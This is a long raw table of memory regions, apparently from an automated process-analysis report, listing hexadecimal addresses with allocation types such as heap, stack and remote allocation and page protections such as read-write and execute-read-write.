|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
15C2E9C2000
|
trusted library allocation
|
page read and write
|
||
|
15C468B0000
|
heap
|
page read and write
|
||
|
15C2ED97000
|
trusted library allocation
|
page read and write
|
||
|
2440E000
|
stack
|
page read and write
|
||
|
7550000
|
heap
|
page read and write
|
||
|
15C301F4000
|
trusted library allocation
|
page read and write
|
||
|
8FAE000
|
stack
|
page read and write
|
||
|
15C2E75E000
|
trusted library allocation
|
page read and write
|
||
|
EA2B000
|
direct allocation
|
page execute and read and write
|
||
|
7200000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
88C6000
|
heap
|
page read and write
|
||
|
39EB000
|
remote allocation
|
page execute and read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
15C2E090000
|
trusted library allocation
|
page read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
15C2FFD5000
|
trusted library allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
2314000
|
heap
|
page read and write
|
||
|
15C2FE38000
|
trusted library allocation
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
15C2C7C0000
|
heap
|
page read and write
|
||
|
287A1E63000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
22D0000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
767E000
|
heap
|
page read and write
|
||
|
A2A0000
|
direct allocation
|
page execute and read and write
|
||
|
909F000
|
stack
|
page read and write
|
||
|
287A3CA7000
|
heap
|
page read and write
|
||
|
15C3E51A000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
287A1EEE000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
15C2ED53000
|
trusted library allocation
|
page read and write
|
||
|
36FCA76000
|
stack
|
page read and write
|
||
|
9832000
|
trusted library allocation
|
page read and write
|
||
|
2482C000
|
direct allocation
|
page read and write
|
||
|
877C000
|
stack
|
page read and write
|
||
|
2460F000
|
stack
|
page read and write
|
||
|
287A1EF0000
|
heap
|
page read and write
|
||
|
23D0000
|
direct allocation
|
page read and write
|
||
|
70FF000
|
stack
|
page read and write
|
||
|
15C2E447000
|
trusted library allocation
|
page read and write
|
||
|
4CF0000
|
heap
|
page execute and read and write
|
||
|
7A1D000
|
stack
|
page read and write
|
||
|
7720000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
858D000
|
stack
|
page read and write
|
||
|
23AF000
|
heap
|
page read and write
|
||
|
15C469AB000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page read and write
|
||
|
15C301E0000
|
trusted library allocation
|
page read and write
|
||
|
8840000
|
heap
|
page read and write
|
||
|
24838000
|
direct allocation
|
page read and write
|
||
|
15C46991000
|
heap
|
page read and write
|
||
|
287A3B90000
|
heap
|
page read and write
|
||
|
7880000
|
heap
|
page execute and read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
287A1ECE000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
2468C000
|
stack
|
page read and write
|
||
|
97B5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B871000
|
trusted library allocation
|
page read and write
|
||
|
6BEB000
|
remote allocation
|
page execute and read and write
|
||
|
15C2E7C1000
|
trusted library allocation
|
page read and write
|
||
|
15C46976000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
888C000
|
heap
|
page read and write
|
||
|
15C3E52A000
|
trusted library allocation
|
page read and write
|
||
|
20E000
|
stack
|
page read and write
|
||
|
287A3B83000
|
heap
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
8881000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
740E000
|
stack
|
page read and write
|
||
|
287A3B72000
|
heap
|
page read and write
|
||
|
284E000
|
unkown
|
page read and write
|
||
|
36FCB79000
|
stack
|
page read and write
|
||
|
24828000
|
direct allocation
|
page read and write
|
||
|
287A3BA0000
|
heap
|
page read and write
|
||
|
61EB000
|
remote allocation
|
page execute and read and write
|
||
|
15C30404000
|
trusted library allocation
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
15C2FE4D000
|
trusted library allocation
|
page read and write
|
||
|
15C466DB000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
15C3E230000
|
trusted library allocation
|
page read and write
|
||
|
8BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
769C000
|
heap
|
page read and write
|
||
|
287A1EE5000
|
heap
|
page read and write
|
||
|
287A3CA2000
|
heap
|
page read and write
|
||
|
287A3BA2000
|
heap
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
300F000
|
heap
|
page read and write
|
||
|
7FFD9B776000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
287A3BA2000
|
heap
|
page read and write
|
||
|
43EB000
|
remote allocation
|
page execute and read and write
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
36FD8CA000
|
stack
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
15C46744000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
5D01000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
4A13000
|
trusted library allocation
|
page execute and read and write
|
||
|
B82B000
|
direct allocation
|
page execute and read and write
|
||
|
287A3820000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
287A3C71000
|
heap
|
page read and write
|
||
|
2476F000
|
stack
|
page read and write
|
||
|
15C3E221000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
15C2FE51000
|
trusted library allocation
|
page read and write
|
||
|
287A3CA2000
|
heap
|
page read and write
|
||
|
7FFD9B8A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
36FC3FE000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A1E31000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
15C468BC000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A1ECD000
|
heap
|
page read and write
|
||
|
287A3C93000
|
heap
|
page read and write
|
||
|
289B1FF000
|
unkown
|
page read and write
|
||
|
2F7D000
|
heap
|
page read and write
|
||
|
24828000
|
direct allocation
|
page read and write
|
||
|
15C46932000
|
heap
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2472E000
|
stack
|
page read and write
|
||
|
143C8040000
|
heap
|
page read and write
|
||
|
4A40000
|
trusted library allocation
|
page read and write
|
||
|
7650000
|
heap
|
page read and write
|
||
|
4A10000
|
trusted library allocation
|
page read and write
|
||
|
288E000
|
stack
|
page read and write
|
||
|
8668000
|
trusted library allocation
|
page read and write
|
||
|
15C30250000
|
trusted library allocation
|
page read and write
|
||
|
5E8F000
|
trusted library allocation
|
page read and write
|
||
|
15C46670000
|
heap
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
287A1EF0000
|
heap
|
page read and write
|
||
|
15C3024B000
|
trusted library allocation
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
85D0000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2800000
|
heap
|
page read and write
|
||
|
287A1CB0000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
15C466FA000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
8BA0000
|
direct allocation
|
page read and write
|
||
|
287A3B88000
|
heap
|
page read and write
|
||
|
287A1EF4000
|
heap
|
page read and write
|
||
|
15C2E770000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
8FD0000
|
heap
|
page read and write
|
||
|
7FFD9B7A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
287A3CD2000
|
heap
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
4A42000
|
trusted library allocation
|
page read and write
|
||
|
87BB000
|
stack
|
page read and write
|
||
|
E5A9BFB000
|
stack
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
15C466D9000
|
heap
|
page read and write
|
||
|
15C2C9C0000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
15C2E110000
|
heap
|
page read and write
|
||
|
3860000
|
remote allocation
|
page execute and read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3B9C000
|
heap
|
page read and write
|
||
|
4CA5000
|
heap
|
page execute and read and write
|
||
|
8AD0000
|
trusted library allocation
|
page read and write
|
||
|
287A1EF8000
|
heap
|
page read and write
|
||
|
2FED000
|
heap
|
page read and write
|
||
|
22D8000
|
heap
|
page read and write
|
||
|
7B4B000
|
stack
|
page read and write
|
||
|
7781000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
7DF4623B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
287A3C9D000
|
heap
|
page read and write
|
||
|
D62B000
|
direct allocation
|
page execute and read and write
|
||
|
15C3041C000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
24800000
|
stack
|
page read and write
|
||
|
287A3B70000
|
heap
|
page read and write
|
||
|
15C2E7D9000
|
trusted library allocation
|
page read and write
|
||
|
15C2C747000
|
heap
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
15C467B0000
|
heap
|
page read and write
|
||
|
2C1F000
|
unkown
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
15C46956000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
92A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
24A00000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
287A3BD5000
|
heap
|
page read and write
|
||
|
287A1E36000
|
heap
|
page read and write
|
||
|
84F0000
|
heap
|
page read and write
|
||
|
287A3BA2000
|
heap
|
page read and write
|
||
|
4A14000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
917E000
|
stack
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
287A3B88000
|
heap
|
page read and write
|
||
|
246F0000
|
remote allocation
|
page read and write
|
||
|
75EB000
|
remote allocation
|
page execute and read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
8ABE000
|
stack
|
page read and write
|
||
|
4A1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
36FCC7E000
|
stack
|
page read and write
|
||
|
287A1E2B000
|
heap
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
287A3BD4000
|
heap
|
page read and write
|
||
|
287A3B78000
|
heap
|
page read and write
|
||
|
259E000
|
stack
|
page read and write
|
||
|
15C301CD000
|
trusted library allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
287A1EEE000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
15C2E040000
|
heap
|
page readonly
|
||
|
24AA0000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
287A3B74000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
4CA0000
|
heap
|
page execute and read and write
|
||
|
287A3BA2000
|
heap
|
page read and write
|
||
|
8AF0000
|
trusted library allocation
|
page read and write
|
||
|
287A3BA2000
|
heap
|
page read and write
|
||
|
3240000
|
trusted library section
|
page read and write
|
||
|
143C7DE0000
|
heap
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
15C2E221000
|
trusted library allocation
|
page read and write
|
||
|
287A1E00000
|
heap
|
page read and write
|
||
|
287A1E71000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
289B0FD000
|
stack
|
page read and write
|
||
|
15C2EBE2000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
24828000
|
direct allocation
|
page read and write
|
||
|
15C2E74E000
|
trusted library allocation
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
15C30440000
|
trusted library allocation
|
page read and write
|
||
|
326C000
|
heap
|
page read and write
|
||
|
287A3CA8000
|
heap
|
page read and write
|
||
|
287A1EE5000
|
heap
|
page read and write
|
||
|
287A1E37000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
287A1E08000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
233B000
|
heap
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
15C2C76E000
|
heap
|
page read and write
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
E5A9AFF000
|
stack
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
15C4695C000
|
heap
|
page read and write
|
||
|
90D0000
|
direct allocation
|
page read and write
|
||
|
771B000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
8FD5000
|
heap
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
287A3B72000
|
heap
|
page read and write
|
||
|
4DEB000
|
remote allocation
|
page execute and read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
15C468B8000
|
heap
|
page read and write
|
||
|
287A3CB0000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3C7D000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
15C2E742000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BC0000
|
direct allocation
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
287A1ECD000
|
heap
|
page read and write
|
||
|
E5A98FE000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F9A000
|
trusted library allocation
|
page read and write
|
||
|
287A3BD2000
|
heap
|
page read and write
|
||
|
287A3BD3000
|
heap
|
page read and write
|
||
|
8FB0000
|
direct allocation
|
page read and write
|
||
|
15C2ED3D000
|
trusted library allocation
|
page read and write
|
||
|
15C2C6C0000
|
heap
|
page read and write
|
||
|
15C2C9C5000
|
heap
|
page read and write
|
||
|
3230000
|
trusted library section
|
page read and write
|
||
|
15C2C731000
|
heap
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
15C467D4000
|
heap
|
page read and write
|
||
|
15C2E74B000
|
trusted library allocation
|
page read and write
|
||
|
905E000
|
stack
|
page read and write
|
||
|
4A60000
|
trusted library allocation
|
page read and write
|
||
|
24834000
|
direct allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
8894000
|
heap
|
page read and write
|
||
|
7540000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6DB000
|
trusted library allocation
|
page read and write
|
||
|
7F5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
84D7000
|
stack
|
page read and write
|
||
|
979D000
|
trusted library allocation
|
page read and write
|
||
|
36FD7CE000
|
stack
|
page read and write
|
||
|
287A3CAD000
|
heap
|
page read and write
|
||
|
3007000
|
heap
|
page read and write
|
||
|
3014000
|
heap
|
page read and write
|
||
|
15C2C72B000
|
heap
|
page read and write
|
||
|
287A1E94000
|
heap
|
page read and write
|
||
|
3065000
|
heap
|
page read and write
|
||
|
15C3042D000
|
trusted library allocation
|
page read and write
|
||
|
24828000
|
direct allocation
|
page read and write
|
||
|
15C2EDA2000
|
trusted library allocation
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
36FCCFE000
|
stack
|
page read and write
|
||
|
8845000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
15C2DFE0000
|
heap
|
page read and write
|
||
|
15C2E030000
|
trusted library allocation
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
2E78000
|
stack
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
15C2E0C0000
|
trusted library allocation
|
page read and write
|
||
|
8AE0000
|
trusted library allocation
|
page read and write
|
||
|
15C3E50B000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
15C2FE22000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
15C2C774000
|
heap
|
page read and write
|
||
|
15C2ED8B000
|
trusted library allocation
|
page read and write
|
||
|
15C2E060000
|
heap
|
page execute and read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
287A1E31000
|
heap
|
page read and write
|
||
|
15C3045B000
|
trusted library allocation
|
page read and write
|
||
|
9190000
|
heap
|
page read and write
|
||
|
2453E000
|
stack
|
page read and write
|
||
|
2346000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3C85000
|
heap
|
page read and write
|
||
|
15C2ED74000
|
trusted library allocation
|
page read and write
|
||
|
24814000
|
direct allocation
|
page read and write
|
||
|
4B7C000
|
stack
|
page read and write
|
||
|
90F0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
246F0000
|
remote allocation
|
page read and write
|
||
|
15C2E067000
|
heap
|
page execute and read and write
|
||
|
7FEB000
|
remote allocation
|
page execute and read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
22C0000
|
heap
|
page readonly
|
||
|
90C0000
|
direct allocation
|
page read and write
|
||
|
287A1DB0000
|
heap
|
page read and write
|
||
|
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
244CE000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
24810000
|
direct allocation
|
page read and write
|
||
|
287A3C7D000
|
heap
|
page read and write
|
||
|
E5A99FE000
|
stack
|
page read and write
|
||
|
15C469A7000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
15C2C7E0000
|
heap
|
page read and write
|
||
|
15C3041A000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
247CB000
|
stack
|
page read and write
|
||
|
15C2ED55000
|
trusted library allocation
|
page read and write
|
||
|
8FC0000
|
direct allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
2351000
|
heap
|
page read and write
|
||
|
15C2E784000
|
trusted library allocation
|
page read and write
|
||
|
15C2C727000
|
heap
|
page read and write
|
||
|
4CEE000
|
stack
|
page read and write
|
||
|
15C2FE60000
|
trusted library allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
15C46790000
|
heap
|
page execute and read and write
|
||
|
287A3B84000
|
heap
|
page read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
901E000
|
stack
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
24A90000
|
heap
|
page read and write
|
||
|
97B3000
|
trusted library allocation
|
page read and write
|
||
|
287A3B73000
|
heap
|
page read and write
|
||
|
287A3C7A000
|
heap
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
287A3B97000
|
heap
|
page read and write
|
||
|
287A1E30000
|
heap
|
page read and write
|
||
|
2448D000
|
stack
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
143C7E70000
|
heap
|
page read and write
|
||
|
E5A97FD000
|
stack
|
page read and write
|
||
|
15C4622A000
|
heap
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
233E000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
15C2E756000
|
trusted library allocation
|
page read and write
|
||
|
15C2E050000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2EE9000
|
heap
|
page read and write
|
||
|
287A1ECD000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
2352000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
36FC9F9000
|
stack
|
page read and write
|
||
|
2347000
|
heap
|
page read and write
|
||
|
707F000
|
stack
|
page read and write
|
||
|
C22B000
|
direct allocation
|
page execute and read and write
|
||
|
90A0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
23BF000
|
heap
|
page read and write
|
||
|
7FFD9B71C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
15C2E76E000
|
trusted library allocation
|
page read and write
|
||
|
4A29000
|
trusted library allocation
|
page read and write
|
||
|
15C467D0000
|
heap
|
page read and write
|
||
|
15C2C72D000
|
heap
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page read and write
|
||
|
287A3B8B000
|
heap
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
|
4E58000
|
trusted library allocation
|
page read and write
|
||
|
249B0000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
23E0000
|
direct allocation
|
page read and write
|
||
|
4A20000
|
trusted library allocation
|
page read and write
|
||
|
287A3C93000
|
heap
|
page read and write
|
||
|
23F0000
|
direct allocation
|
page read and write
|
||
|
8AC1000
|
trusted library allocation
|
page read and write
|
||
|
9120000
|
heap
|
page read and write
|
||
|
3062000
|
heap
|
page read and write
|
||
|
15C469B6000
|
heap
|
page read and write
|
||
|
287A3B94000
|
heap
|
page read and write
|
||
|
15C2E115000
|
heap
|
page read and write
|
||
|
57EB000
|
remote allocation
|
page execute and read and write
|
||
|
15C30409000
|
trusted library allocation
|
page read and write
|
||
|
8635000
|
trusted library allocation
|
page read and write
|
||
|
287A1EF7000
|
heap
|
page read and write
|
||
|
287A3CCC000
|
heap
|
page read and write
|
||
|
24818000
|
direct allocation
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AF0000
|
heap
|
page readonly
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
287A1EFB000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
A42B000
|
direct allocation
|
page execute and read and write
|
||
|
245CE000
|
stack
|
page read and write
|
||
|
36FC87E000
|
stack
|
page read and write
|
||
|
287A3BA0000
|
heap
|
page read and write
|
||
|
287A3CA0000
|
heap
|
page read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
|
2457F000
|
stack
|
page read and write
|
||
|
15C2EDAF000
|
trusted library allocation
|
page read and write
|
||
|
15C46999000
|
heap
|
page read and write
|
||
|
7FFD9B6C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
E5A94FF000
|
stack
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
2482C000
|
direct allocation
|
page read and write
|
||
|
8BD0000
|
direct allocation
|
page read and write
|
||
|
78B7000
|
trusted library allocation
|
page read and write
|
||
|
9100000
|
direct allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
36FCDFB000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3C80000
|
heap
|
page read and write
|
||
|
8A7E000
|
stack
|
page read and write
|
||
|
287A1EE7000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2FAF000
|
heap
|
page read and write
|
||
|
2FA3000
|
heap
|
page read and write
|
||
|
15C2E010000
|
trusted library allocation
|
page read and write
|
||
|
89EB000
|
remote allocation
|
page execute and read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
8C00000
|
direct allocation
|
page read and write
|
||
|
4A3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
15C2C729000
|
heap
|
page read and write
|
||
|
15C2E7C5000
|
trusted library allocation
|
page read and write
|
||
|
287A3C9D000
|
heap
|
page read and write
|
||
|
E5A91FE000
|
stack
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
4AEF000
|
stack
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
287A1EFB000
|
heap
|
page read and write
|
||
|
15C2C785000
|
heap
|
page read and write
|
||
|
287A1E3E000
|
heap
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
76AA000
|
heap
|
page read and write
|
||
|
8F6F000
|
stack
|
page read and write
|
||
|
85CF000
|
stack
|
page read and write
|
||
|
287A1F70000
|
heap
|
page read and write
|
||
|
2464D000
|
stack
|
page read and write
|
||
|
15C468F2000
|
heap
|
page read and write
|
||
|
287A3C72000
|
heap
|
page read and write
|
||
|
7FFD9B87A000
|
trusted library allocation
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
4A45000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B77C000
|
trusted library allocation
|
page execute and read and write
|
||
|
143C7E10000
|
heap
|
page read and write
|
||
|
234D000
|
heap
|
page read and write
|
||
|
36FCAF8000
|
stack
|
page read and write
|
||
|
249D000
|
stack
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
287A1E2A000
|
heap
|
page read and write
|
||
|
287A3B7B000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
AE2B000
|
direct allocation
|
page execute and read and write
|
||
|
87FE000
|
stack
|
page read and write
|
||
|
8666000
|
trusted library allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
15C46C40000
|
heap
|
page read and write
|
||
|
15C2E210000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
246F0000
|
remote allocation
|
page read and write
|
||
|
24820000
|
direct allocation
|
page read and write
|
||
|
4D01000
|
trusted library allocation
|
